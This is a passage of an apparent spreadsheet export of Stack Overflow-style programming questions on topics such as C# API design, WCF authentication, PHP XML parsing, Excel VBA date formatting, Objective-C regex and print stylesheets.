&lt;p&gt;[Edit to add:] To those who asked: I don't need runtime hotswapping. Its perfectly fine for me to have the app closed, manipulate the assembly, then restart the program again.&lt;/p&gt;
&lt;p&gt;[Edit one more time:] It looks like the general consensus is "manipulating the assembly is a &lt;strong&gt;bad&lt;/strong&gt; way to patch a program". I won't go down that road if its a &lt;a href="http://weblogs.asp.net/alex_papadimoulis/archive/2005/05/25/408925.aspx" rel="nofollow"&gt;bad idea&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I'll leave the question open because MSIL injection might still be useful for other purposes :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a CSS parser for C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My program need to parse css files into an in-memory object format. Any advice on how this should be done ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interesting API Design/Pattern</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am re-designing part of our internal ORM tool, and I want to expose Field (a class that represents a field in the database, like CustomerFirstName) directly to the end-developer.&lt;/p&gt;
&lt;p&gt;So that was easy enough to accomplish, however the API got a little ugly because this Field class was previously used internally and is too open. For instance, and this is just one small example: the IsDirty property was not read-only, and that's something end-developers shouldn't be able to tamper with.&lt;/p&gt;
&lt;p&gt;I thought about maybe creating two interfaces, IPublicField and IPrivateField, and trying to get the field class to implement both of them. However, continuing with the IsDirty example, I didn't want something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public ReadOnly Property PrivateIsDirty Implements IPrivateField.IsDirty
 ...
End  Property
Public Property IsDirty Implements IPublicField.IsDirty
 ...
End  Property
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...It's just a little ugly, plus you could still cast back to the Field class and get into the non-readonly method. I also didn't want to introduce a seperate setter method because it would be another breaking change that I don't want to think about, and it also would create an inconsistency with other parts of the API.&lt;/p&gt;
&lt;p&gt;I ended up renaming the Field class to InnerField, and creating a facade/wrapper style structure around it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Class Field
    Implements BusinessObjects.IField
    Private InnerField As BusinessObjects.IInnerField
    Public Sub New(ByVal field As IInnerField)
        InnerField = field
    End Sub
    ...
     Public ReadOnly Property IsDirty() As Boolean Implements BusinessObjects.IField.IsDirty
        Get
            Return InnerField.IsDirty
        End Get
    End Property
    ...
End Class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems to be working out pretty well. Internally, the InnerField is suitably open and we have the freedom to make it more open in the future without impacting end-developers, and externally the Field class provides the simplified, locked down tool that end-developers need.&lt;/p&gt;
&lt;p&gt;So, assuming that was coherent, I was wondering how you might have proceeded in this situation, and whether my solution seems reasonable from the outside.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom validation summary</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the UpdateModel method for validation. How do I specify the text for the error messages as they appear in the validation summary?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Sorry, I wasn't entirely clear. When I call UpdateModel(), if there is parsing error, for example if a string value is specified for a double field, a "SomeProperty is invalid" error message is automatically added to the ModelState.&lt;/p&gt;
&lt;p&gt;How do I specify the text for said &lt;em&gt;automatically&lt;/em&gt; generated error message?&lt;/p&gt;
&lt;p&gt;If I implement IDataErrorInfo as suggested, it's error message property gets called for &lt;em&gt;every&lt;/em&gt; column, regardless of whether the default binder deems it valid or not.&lt;/p&gt;
&lt;p&gt;I'd have to reimplement the parse error catching functionality that I get for free with the default binder.&lt;/p&gt;
&lt;p&gt;Incidentally, the default "SomeProperty is invalid" error messages seem to have mysteriously dissappeared in the RC. A validation summary appears and the relevant fields are highlighted but the text is missing! Any idea why this is?&lt;/p&gt;
&lt;p&gt;Thanks again and I hope all this waffle makes sense!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2-D (concurrent) HashMap: 2-property key type? hashmap of hashmaps? [update]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I need a 2-dimensional &lt;code&gt;ConcurrentHashMap&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It has to be as blazing fast as possible, as I'm going to be adding to and updating its values extremely frequently.  It's in a multithreaded application, hence the choice to use ConcurrentHashMap instead of just HashMap.&lt;/p&gt;
&lt;p&gt;Both the "x" and "y" indices are integers with a known range (0 through 40,000,000).&lt;/p&gt;
&lt;p&gt;What I need to know is: What's the most efficient way to implement this so it'll be as speedy as possible?  The most obvious route is to do a literal 2-D hashmap:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ConcurrentHashMap&amp;lt;Integer, ConcurrentHashMap&amp;lt;Integer, ValueObj&amp;gt;&amp;gt; foo;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Or I could make a private class "IntPair" with two properties x and y, and use that as a key... though if I do that, what's the most efficient way to do &lt;code&gt;equals()&lt;/code&gt; and &lt;code&gt;hashcode()&lt;/code&gt;?  and will I wind up allocating too many new &lt;code&gt;IntPair&lt;/code&gt;s?   Could I keep a set of &lt;code&gt;IntPair&lt;/code&gt;s for each x/y I've assigned, and then use a purely reflexive equals() such that I'm just checking for the exact same object instance?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Update:&lt;/h2&gt;
&lt;p&gt;Now that I've taken a closer look at Integer.valueOf(int), the specific caching model it uses wouldn't make sense here, since I'm dealing with a very sparse matrix with unpredictable entries.  I really need to be caching all those IntPairs which are used, not a prespecified subset.&lt;/p&gt;
&lt;p&gt;Intuitively, it seems to me that looking up an IntPair in a big map to see if I've already created it would, in fact, be more-or-less the same as just looking it up in the big "2-D" ConcurrentHashMap anyway, wouldn't it?  So it seems the solution here is really to just use &lt;code&gt;new IntPair(x,y)&lt;/code&gt; each time I look up a key.  Yes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to effectively use DTO objects (Data Transfer Objects)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to implement DTOs?&lt;/p&gt;
&lt;p&gt;My understanding is that they are one way to transfer data between objects.  For example, in an ASP.Net app, you might use a DTO to send data from the code-behind to the business logic layer component.&lt;/p&gt;
&lt;p&gt;What about other options, like just sending the data as method parameters?  (Would this be easiest in asces wher there is less data to send?)&lt;/p&gt;
&lt;p&gt;What about a static class that just holds data, that can be referenced by other objects (a kind of global asembly data storage class)?  (Does this break encapsulation too much?)&lt;/p&gt;
&lt;p&gt;What about a single generic DTO used for every transfer?  It may be a bit more trouble to use, but reduces the number of classes needed to work with (reduces object clutter).&lt;/p&gt;
&lt;p&gt;Thanks for sharing your thoughts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good profiler for a CLI based multi-threaded PHP application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written a batch processor that runs multiple threads (pcntl_fork) and I'm getting some weird results when child processes go defunct and don't seem to let go of their resources.&lt;/p&gt;
&lt;p&gt;Is there a good code profiler, trace utility I can use to 'watch' the parent process and children to see what is going on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you detect when the user clicks on the notification icon in Windows Mobile (.NET CF 3.5)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Surfing the net, I came across this:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://groups.google.com/group/microsoft.public.dotnet.framework.compactframework/msg/d202f6a36c5c4295?dmode=source&amp;amp;hl=en" rel="nofollow"&gt;this code&lt;/a&gt; that shows how to display a notification at the bottom of the screen on a Windows Mobile device. My question is, is there a way to either specify which options are displayed beneath the notification (on the taskbar) or is there a way to detect when the user clicks on the notification itself, so that I can react to that programmatic ally.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP XML Parsing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which is the best way to parse an XML file in PHP ?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;First&lt;/strong&gt;&lt;br/&gt;
Using the DOM object &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//code
$dom = new DOMDocument();
$dom-&amp;gt;load("xml.xml");
$root = $dom-&amp;gt;getElementsByTagName("tag");
foreach($root as $tag)
{
$subChild = $root-&amp;gt;getElementsByTagName("child");
// extract values and loop again if needed
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Second&lt;/strong&gt;&lt;br/&gt;
Using the simplexml_load Method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// code
$xml = simplexml_load_string("xml.xml");
$root = $xml-&amp;gt;root;
foreach($root as $tag)
{
$subChild = $tag-&amp;gt;child;
// extract values and loop again if needed
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note :
These are the two I am aware of. If there are more fill in.&lt;/p&gt;
&lt;p&gt;Wanted to know which method is the best for parsing huge XML files, also which method is the &lt;strong&gt;fastest&lt;/strong&gt; irrespective of the way the method needs to be implemented&lt;/p&gt;
&lt;p&gt;Size will be varying from 500KB to 2MB. The parser should be able to parse small as well as large files in the least amount of time with good memory usage if possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Special mouse events in a browser: wheel, right-click?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Google maps is an impressive display of what you can do with javascript and Ajaxy-goodness.  Even my mouse scroll wheel and right-click works to provide specific functionality.&lt;/p&gt;
&lt;p&gt;In the standard HTML spec, I don't see an "onmouserightclick" event or similar basic javascript handling for the mouse wheel.  Maybe I am looking in the wrong places.&lt;/p&gt;
&lt;p&gt;I presume these events are browser and platform specific (or "sensitive" instead of specific).  And am wondering what the basic, plain HTML and Javascript is needed to exploit these events, in ALL browsers.&lt;/p&gt;
&lt;p&gt;Naturally, when designing a site these features have to be extra, since some people still use the one-button mouse.&lt;/p&gt;
&lt;p&gt;How to I use events with the mouse wheel and right-click?  I'm looking for sample code.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Thanks for the jQuery code guys!  The system-developer in me still has questions and doubts though.  Mainly I'm concerned about platform-limitations that would seem to apply here.  Is there a browser that some of these features don't work in?  Does the mouse wheel up and down events also allow for mouse wheel click events?  I would just expect there to be some limitation out there and am wondering if it's officially documented.  I want to know how it works at the low level.  I am glad to see it is easy in jQuery, another reason for me to get into it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way of formally expressing usability requirements?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a system requirements document and need to include non-functional requirements relating to the usability of the system, but am not sure of the best way to express this.&lt;/p&gt;
&lt;p&gt;"The system shall be easy to use" seems a bit vague to me, and not testable. Are there any 'official' standards/guidelines that can be adhered to relating to the usability of a program?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to open a file for non-exclusive write access using .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to open a file in .NET with non exclusive write access? If so, how? My hope is to have two or more processes write to the same file at the same time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Here is the context of this question: I am writing a simple logging HTTPModule for IIS. Since applications running in different app pools run as distinct processes, I need a way to share the log file between processes. I could write a complex file locking routine, or a lazy writer, but this is a throw away project so its not important.&lt;/p&gt;
&lt;p&gt;This is the test code I used to figure out the process.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Threading;
namespace FileOpenTest
{
    class Program
    {
        private static bool keepGoing = true;
        static void Main(string[] args)
        {
            Console.CancelKeyPress += new ConsoleCancelEventHandler(Console_CancelKeyPress);
            Console.Write("Enter name: ");
            string name = Console.ReadLine();
            //Open the file in a shared write mode
            FileStream fs = new FileStream("file.txt", 
                                           FileMode.OpenOrCreate, 
                                           FileAccess.ReadWrite, 
                                           FileShare.ReadWrite);
            while (keepGoing)
            {
                AlmostGuaranteedAppend(name, fs);
                Console.WriteLine(name);
                Thread.Sleep(1000);
            }
            fs.Close();
            fs.Dispose();
        }
        private static void AlmostGuaranteedAppend(string stringToWrite, FileStream fs)
        {
            StreamWriter sw = new StreamWriter(fs);
            //Force the file pointer to re-seek the end of the file.
            //THIS IS THE KEY TO KEEPING MULTIPLE PROCESSES FROM STOMPING
            //EACH OTHER WHEN WRITING TO A SHARED FILE.
            fs.Position = fs.Length;
            //Note: there is a possible race condition between the above
            //and below lines of code. If a context switch happens right
            //here and the next process writes to the end of the common
            //file, then fs.Position will no longer point to the end of
            //the file and the next write will overwrite existing data.
            //For writing periodic logs where the chance of collision is
            //small, this should work.
            sw.WriteLine(stringToWrite);
            sw.Flush();
        }
        private static void Console_CancelKeyPress(object sender, ConsoleCancelEventArgs e)
        {
            keepGoing = false;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How would a php or java client authenticate if I'm using WCF w/ forms auth?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a generic proof of concept WCF service that is using forms authentication to secure access.  All works great when my client is .NET (vb code below)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim client As SupplierServiceClient = New SupplierServiceClient()
client.ClientCredentials.UserName.UserName = "xxxx@xxx.xx.xx"
client.ClientCredentials.UserName.Password = "password"
Dim SupplierList As List(Of Supplier) = client.GetSuppliers()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but as I want this to interop w/ anyone who can do SOAP 1.1/1.2 - how would a PHP or Java client connect?&lt;/p&gt;
&lt;p&gt;My WCF web.config is listed below (fyi)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;system.serviceModel&amp;gt;
	&amp;lt;services&amp;gt;
		&amp;lt;service name="SampleApplicationWCF.Library.SupplierService" behaviorConfiguration="NorthwindBehavior"&amp;gt;
			&amp;lt;endpoint address="" name="wsHttpSupplierService" contract="SampleApplicationWCF.Library.ISupplierService" binding="wsHttpBinding" bindingConfiguration="wsHttp"/&amp;gt;
			&amp;lt;endpoint address="https://server/SampleApplicationWCF/SupplierService.svc/Basic" name="basicHttpSupplierService" contract="SampleApplicationWCF.Library.ISupplierService" binding="basicHttpBinding" bindingConfiguration="basicHttp"/&amp;gt;
			&amp;lt;endpoint contract="IMetadataExchange" binding="mexHttpBinding" address="mex"/&amp;gt;
		&amp;lt;/service&amp;gt;
	&amp;lt;/services&amp;gt;
	&amp;lt;bindings&amp;gt;
		&amp;lt;wsHttpBinding&amp;gt;
			&amp;lt;binding name="wsHttp"&amp;gt;
				&amp;lt;security mode="TransportWithMessageCredential"&amp;gt;
					&amp;lt;transport/&amp;gt;
					&amp;lt;message clientCredentialType="UserName" negotiateServiceCredential="false" establishSecurityContext="true"/&amp;gt;
				&amp;lt;/security&amp;gt;
			&amp;lt;/binding&amp;gt;
		&amp;lt;/wsHttpBinding&amp;gt;
		&amp;lt;basicHttpBinding&amp;gt;
			&amp;lt;binding name="basicHttp"&amp;gt;
				&amp;lt;security mode="TransportWithMessageCredential"&amp;gt;
					&amp;lt;transport/&amp;gt;
					&amp;lt;message clientCredentialType="UserName"/&amp;gt;
				&amp;lt;/security&amp;gt;
			&amp;lt;/binding&amp;gt;
		&amp;lt;/basicHttpBinding&amp;gt;
	&amp;lt;/bindings&amp;gt;
	&amp;lt;behaviors&amp;gt;
		&amp;lt;serviceBehaviors&amp;gt;
			&amp;lt;behavior name="NorthwindBehavior"&amp;gt;
				&amp;lt;serviceMetadata httpGetEnabled="true"/&amp;gt;
				&amp;lt;serviceAuthorization principalPermissionMode="UseAspNetRoles"/&amp;gt;
				&amp;lt;serviceCredentials&amp;gt;
					&amp;lt;userNameAuthentication userNamePasswordValidationMode="MembershipProvider"/&amp;gt;
				&amp;lt;/serviceCredentials&amp;gt;
			&amp;lt;/behavior&amp;gt;
		&amp;lt;/serviceBehaviors&amp;gt;
	&amp;lt;/behaviors&amp;gt;
&amp;lt;/system.serviceModel&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to compile the generated AS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;hope you can help me with this question.&lt;/p&gt;
&lt;p&gt;So, I've been working for a while with Flex, and had the crazy idea to create pure AS project.&lt;/p&gt;
&lt;p&gt;If I compile a Flex app with the -keep flag, the generated actionscript gets generated.&lt;/p&gt;
&lt;p&gt;Do you guys know of a way to make it compile, without going trough the code and gluing it all together? &lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>EXCEL VBA CSV Date formatting issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am an Excel VBA newbie. My apologies if I am asking what seems to be an obvious question.
I have a CSV text file I am opening in an Excel worksheet. One row of the file contains date information formatted as "YY-MMM', (ie: 9-FEB, or 10-MAY). When the Excel spreadsheet opens the file the date information is changed to "mm/dd/yyyy" format and reads as 02/09/2009 or 05/10/2009 where the YY-MMM is now MM/YY/2009, (ie: the 9-FEB becomes 02/09/2009, and the 10-MAY becomes 05/10/2009). &lt;/p&gt;
&lt;p&gt;I would like to know if it is possible to reformat the field from YY-MMM to mm/01/yyyy.&lt;/p&gt;
&lt;p&gt;I have tried to parse the date field after converting it to text with &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Range("B11", "IV11").NumberFormat = "text"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, then the value is a serial date and non-parsable.&lt;/p&gt;
&lt;p&gt;I have been unsuccessfully looking for a list of the NumberFormat options.&lt;/p&gt;
&lt;p&gt;If you can point me in a direction it will be much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open web.config from console application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a console capplication that runs on the same computer that hosts a bunch of web.config files.  I need the console application to open each web.config file and decrypt the connection string and then test if the connection string works.&lt;/p&gt;
&lt;p&gt;The problem I am running into is that OpenExeConfiguration is expecting a winforms application configuration file (app.dll.config) and OpenWebConfiguration needs to be run through IIS.  Since this is my local machine, I'm not running IIS (I use Visual Studio's built-in server).&lt;/p&gt;
&lt;p&gt;Is there a way I can open the web.config files while still getting the robustness of .NET's capabilities to decrypt the connectionstrings?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;
The OpenWebConfiguration works if you are querying IIS directly or are the website in question that you want to look up the web.config for.  What I am looking to accomplish is the same sort of functionality, but from a console application opening up the web.config file of a website on my same machine not using an IIS query because IIS isn't running on my machine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I limit a user's permission in Sharepoint to a single survey</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a user group set up in Sharepoint that has permission to access to a single site.  I would like to restrict this groups access futher to a single survey within that site.  Is there any way to set Sharepoint permissions to a more granular level?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing XML from the National Weather Service SOAP Service in C# LINQ to XML</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a junior C# programmer that's trying to develop a library that will allow me to encapsulate the nasty details of parsing the XML returned from the NWS, and returning a collection representing the data.&lt;/p&gt;
&lt;p&gt;My SOAP request would return an XML document in this form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;dwml version="1.0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.nws.noaa.gov/forecasts/xml/DWMLgen/schema/DWML.xsd"&amp;gt;
  &amp;lt;head&amp;gt;
    &amp;lt;product srsName="WGS 1984" concise-name="time-series" operational-mode="official"&amp;gt;
      &amp;lt;title&amp;gt;NOAA's National Weather Service Forecast Data&amp;lt;/title&amp;gt;
      &amp;lt;field&amp;gt;meteorological&amp;lt;/field&amp;gt;
      &amp;lt;category&amp;gt;forecast&amp;lt;/category&amp;gt;
      &amp;lt;creation-date refresh-frequency="PT1H"&amp;gt;2009-02-04T20:01:00Z&amp;lt;/creation-date&amp;gt;
    &amp;lt;/product&amp;gt;
    &amp;lt;source&amp;gt;
      &amp;lt;more-information&amp;gt;http://www.nws.noaa.gov/forecasts/xml/&amp;lt;/more-information&amp;gt;
      &amp;lt;production-center&amp;gt;Meteorological Development Laboratory&amp;lt;sub-center&amp;gt;Product Generation Branch&amp;lt;/sub-center&amp;gt;&amp;lt;/production-center&amp;gt;
      &amp;lt;disclaimer&amp;gt;http://www.nws.noaa.gov/disclaimer.html&amp;lt;/disclaimer&amp;gt;
      &amp;lt;credit&amp;gt;http://www.weather.gov/&amp;lt;/credit&amp;gt;
      &amp;lt;credit-logo&amp;gt;http://www.weather.gov/images/xml_logo.gif&amp;lt;/credit-logo&amp;gt;
      &amp;lt;feedback&amp;gt;http://www.weather.gov/feedback.php&amp;lt;/feedback&amp;gt;
    &amp;lt;/source&amp;gt;
  &amp;lt;/head&amp;gt;
  &amp;lt;data&amp;gt;
    &amp;lt;location&amp;gt;
      &amp;lt;location-key&amp;gt;point1&amp;lt;/location-key&amp;gt;
      &amp;lt;point latitude="42.23" longitude="-83.27"/&amp;gt;
    &amp;lt;/location&amp;gt;
    &amp;lt;moreWeatherInformation applicable-location="point1"&amp;gt;http://forecast.weather.gov/MapClick.php?textField1=42.23&amp;amp;amp;textField2=-83.27&amp;lt;/moreWeatherInformation&amp;gt;
    &amp;lt;time-layout time-coordinate="local" summarization="none"&amp;gt;
      &amp;lt;layout-key&amp;gt;k-p24h-n7-1&amp;lt;/layout-key&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-04T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-04T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-05T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-05T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-06T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-06T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-07T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-07T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-08T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-08T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-09T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-09T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-10T07:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-10T19:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
    &amp;lt;/time-layout&amp;gt;
    &amp;lt;time-layout time-coordinate="local" summarization="none"&amp;gt;
      &amp;lt;layout-key&amp;gt;k-p24h-n6-2&amp;lt;/layout-key&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-04T19:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-05T08:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-05T19:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-06T08:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-06T19:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-07T08:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-07T19:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-08T08:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-08T19:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-09T08:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
      &amp;lt;start-valid-time&amp;gt;2009-02-09T19:00:00-05:00&amp;lt;/start-valid-time&amp;gt;
      &amp;lt;end-valid-time&amp;gt;2009-02-10T08:00:00-05:00&amp;lt;/end-valid-time&amp;gt;
    &amp;lt;/time-layout&amp;gt;
    &amp;lt;parameters applicable-location="point1"&amp;gt;
      &amp;lt;temperature type="maximum" units="Fahrenheit" time-layout="k-p24h-n7-1"&amp;gt;
        &amp;lt;name&amp;gt;Daily Maximum Temperature&amp;lt;/name&amp;gt;
        &amp;lt;value&amp;gt;15&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;19&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;33&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;46&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;41&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;43&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;44&amp;lt;/value&amp;gt;
      &amp;lt;/temperature&amp;gt;
      &amp;lt;temperature type="minimum" units="Fahrenheit" time-layout="k-p24h-n6-2"&amp;gt;
        &amp;lt;name&amp;gt;Daily Minimum Temperature&amp;lt;/name&amp;gt;
        &amp;lt;value&amp;gt;-2&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;16&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;29&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;32&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;27&amp;lt;/value&amp;gt;
        &amp;lt;value&amp;gt;32&amp;lt;/value&amp;gt;
      &amp;lt;/temperature&amp;gt;
    &amp;lt;/parameters&amp;gt;
  &amp;lt;/data&amp;gt;
&amp;lt;/dwml&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm trying to put the maximum and minimum temps that are inside this XML in separate collections of strings while ignoring the "name" elements using LINQ.&lt;/p&gt;
&lt;p&gt;Edit:
This is the code I use to get the XML from the Web Reference:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    WeatherNWS.ndfdXML client = new TestNWS.WeatherNWS.ndfdXML();
    string XMLZip = client.LatLonListZipCode("48180");
    XElement myElement = XElement.Parse(XMLZip);
    string[] myString = myElement.Value.Split(',');
    decimal lat = Convert.ToDecimal(myString[0]);
    decimal lon = Convert.ToDecimal(myString[1]);
    weatherParametersType parameters = new weatherParametersType();
    parameters.maxt = true;
    parameters.mint = true;
    string XML = client.NDFDgen(lat, lon, productType.timeseries, DateTime.Now, DateTime.Now.AddDays(7), parameters);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>objective-c: determining if a regex matches a string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's wrong with the following code?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-(IBAction)numFieldDoneEditing{
        NSPredicate * regexTest = [NSPredicate predicateWithFormat: @"SELF MATCHES '^\\d*\\.\\d{2}$'"];
        NSString *text = [[NSString alloc] initWithFormat: @"%@", numberField.text];
        if ([regexTest evaluateWithObject: text] == YES) {
        		//do something
        }
        else{
        		//do something else
        }
        [text release];
        [regexTest release];
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I enumerate and load resources in an iPhone app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to populate an NSArray with a collection of images in Resources.  However, for maximum flexibility, I'm trying to avoid hard-coding the filenames or even how many files there are.&lt;/p&gt;
&lt;p&gt;Normally, I'd do something like this example from the sample code at apple:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;kNumImages = 5;  //or whatever
NSMutableArray *images;
for (i = 1; i &amp;lt;= kNumImages; i++)
{
    NSString *imageName = [NSString stringWithFormat:@"image%d.jpg", i];
    [images addObject:[UIImage imageNamed:imageName];
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I'm trying to avoid kNumImages entirely.  Is there a way to run a regex or something on resources?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>print.css is printing very small text</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My print.css pages are printing out very small, super reduced and the text is like 6 pt.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@charset "UTF-8";
/* CSS Document */
body {
   background: white;
   font-size: 12pt;
   /* Change text colour to black (useful for light text on a dark background) */
.lighttext
    color: #000 
}
/* Remove unwanted elements */
#menu, #header, #nav, #prod, #home, #our, #work, #whole, #contact, #circle, #logo, #flower, #navblank, #bottom, .noprint
{
display: none;
}
#wrapper, #content {
   width: auto;
   margin: 0 5%;
   padding: 0;
   border: 0;
   float: none !important;
   color: black;
   background: transparent none;
   }
div#content {
   margin-left: 10%;
   padding-top: 1em;
   border-top: 1px solid #930;
   }
div#mast {
   margin-bottom: -8px;
   }
div#mast img {
   vertical-align: bottom;
   }
a:link, a:visited {
   color: #520;
   background: transparent;
   font-weight: bold;
   text-decoration: underline;
   }
#content a:link:after, #content a:visited:after {
